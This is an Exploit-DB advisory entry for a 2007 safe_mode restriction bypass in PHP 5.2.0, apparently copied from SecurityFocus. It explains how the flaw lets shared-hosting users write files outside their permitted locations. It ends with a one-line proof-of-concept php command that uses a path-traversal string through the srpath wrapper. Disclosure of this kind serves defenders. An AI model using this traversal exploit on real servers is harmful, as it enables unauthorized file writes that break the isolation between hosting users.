PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass

EDB-ID:

29528




Platform:

PHP

Date:

2007-01-26


source: https://www.securityfocus.com/bid/22261/info

PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, all assuming that the 'safe_mode' restriction will isolate users from each other.

This issue is reported to affect PHP version 5.2.0; other versions may also be vulnerable. 

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'